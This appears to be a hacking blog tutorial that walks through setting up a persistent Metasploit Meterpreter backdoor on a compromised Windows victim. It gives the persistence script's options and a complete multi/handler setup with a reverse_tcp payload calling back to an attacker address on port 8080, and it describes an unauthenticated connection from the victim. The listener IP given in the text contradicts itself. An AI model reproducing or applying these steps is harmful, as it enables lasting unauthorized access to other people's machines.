5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Bookmark

Type : Tutorial

Level : Medium, Advanced

Some people and student asking about what should we do after successfully compromising or exploiting victim?

Some exploit such as CVE-2010-3962 when executed can make victim computer hangs. When computer hangs some user choose to restart the computer and it will make the previous exploit become ineffective.

What we will do here is Maintaining Access, to leave yourself an easier way back into the system later. By using this method, if the service you exploited is down or patched, you can still gain access to the system for future use.

The Metasploit Persistent Meterpreter Service is what we will use in this tutorial, but there’s warning when you use this persistent Meterpreter as shown in this tutorial requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk.

Requirement :

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5 :

1. You need to set your payload of your exploit to meterpreter to do this method.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

2. run persistence -h to view help list

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address 192.168.8.89 on port 8080.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Notice that the script output gives you the command to "remove" the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation :

-U : start the backdoor when user log in to system

-i : load backdoor every 5 second

-p : will running on port 8080

-r : connect back to 192.168.8.90 (specified ip address)

4. To make sure that it works, try reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...

5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Let we see what happen to remote user :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

There’s established connection between attacker and remote host.

Hope it’s useful 🙂

Share this article if you found it was useful:

Blogger at hacking-tutorial.com.

See all posts by || Visit Website : http://www.vishnuvalentino.com